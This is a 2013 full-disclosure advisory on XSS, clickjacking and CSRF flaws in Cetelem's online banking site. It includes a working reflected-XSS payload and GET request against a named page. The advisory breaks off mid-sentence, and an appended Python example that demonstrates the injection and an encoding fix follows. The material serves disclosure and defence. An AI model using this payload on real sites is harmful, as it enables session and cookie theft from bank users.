===============================================================================
CETELEM ON LINE BANK
Cross Site Scripting ( and DOM Based XSS ) / Clickjacking: X-Frame-Options header missing / HTML form without CSRF protection
===============================================================================

TIME-LINE VULNERABILITY

Multiple advisories sent, but the vendor did not respond.
25-31 / 08 / 2013    No response ( Summer time? )
3-09-2013            Full Disclosure

I. VULNERABILITY
-------------------------
#Title: CETELEM ON LINE BANK DOM Based Cross Site Scripting ( and DOM Based XSS ) / Clickjacking: X-Frame-Options header missing / HTML form without CSRF protection
#Vendor: httpS://www.cetelem.es/
#Author: Juan Carlos García (@secnight)
#Follow me: http://www.highsec.es  Twitter: @secnight

II. DESCRIPTION
-------------------------
Cetelem is a bank specializing in consumer lending (consumer credit, online credit and cards).
Cetelem's main activity is point-of-sale financing, which accounts for 66.5% of its business, through more than 2,800 stores and more than 1,000 partner car dealers.
Credit card issuing represents 26% of its activity, with about 500,000 active cards at present.
Cetelem is one of the major brands of BNP Paribas Personal Finance (Argentina, Spain, France, Hungary, Portugal, Czech Republic, Romania, Russia, Slovakia).

III. PROOF OF CONCEPT
-------------------------

Cross site scripting
*********************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user.
Because a browser cannot know whether the script should be trusted, it executes the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.

Affected items

/banco/creditos/unificacion-credito.jsp (2)

URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad="
The input is reflected inside a tag parameter between double quotes.

GET /banco/creditos/unificacion-credito.jsp?hidAcuerdo=BCO_CONSO%22%20onmouseover%3dprompt%28999458%29%20bad%3d%22&loadParam=false

Variant
URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad="

LoadParam
URL encoded GET input loadParam was set to false_930312():;922135
The input is reflected inside
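The following Python example is added here to illustrate the attribute-context reflection reported above and the missing X-Frame-Options check; it is not part of the advisory or of Cetelem's code. It decodes the PoC's hidAcuerdo parameter, renders it into a hidden input first without encoding and then with attribute-context encoding, and tokenises both results the way a browser would. The render functions, the CSP frame-ancestors check and the sample header dictionaries are assumptions for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request path and query from the advisory's PoC (payload taken from the page above).
POC_REQUEST = ("/banco/creditos/unificacion-credito.jsp?hidAcuerdo="
               "BCO_CONSO%22%20onmouseover%3dprompt%28999458%29%20bad%3d%22&loadParam=false")


def query_param(url, name):
    """Decode one GET parameter the way the server-side JSP would receive it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_hidden_vulnerable(value):
    """Assumed vulnerable pattern: the value is placed between double quotes unencoded."""
    return '<input type="hidden" name="hidAcuerdo" value="%s">' % value


def render_hidden_fixed(value):
    """Hardened form: attribute-context encoding turns '"' into &quot; so the
    attribute cannot be closed and no new attributes can be introduced."""
    return '<input type="hidden" name="hidAcuerdo" value="%s">' % html.escape(value, quote=True)


class _FirstTagAttrs(HTMLParser):
    """Collects the attributes of the first start tag, as a browser tokeniser would."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)


def parsed_attributes(markup):
    p = _FirstTagAttrs()
    p.feed(markup)
    p.close()
    return p.attrs or {}


def injected_event_handlers(markup):
    """Any on* attribute seen by the parser means the payload broke out of the value."""
    return sorted(k for k in parsed_attributes(markup) if k.startswith("on"))


def clickjacking_headers_missing(headers):
    """True when neither X-Frame-Options nor a CSP frame-ancestors directive is set."""
    h = {k.lower(): v for k, v in headers.items()}
    return "x-frame-options" not in h and \
        "frame-ancestors" not in h.get("content-security-policy", "").lower()
```

Running `injected_event_handlers(render_hidden_vulnerable(query_param(POC_REQUEST, "hidAcuerdo")))` returns `['onmouseover']`, while the fixed renderer yields no injected attributes and preserves the original value byte for byte.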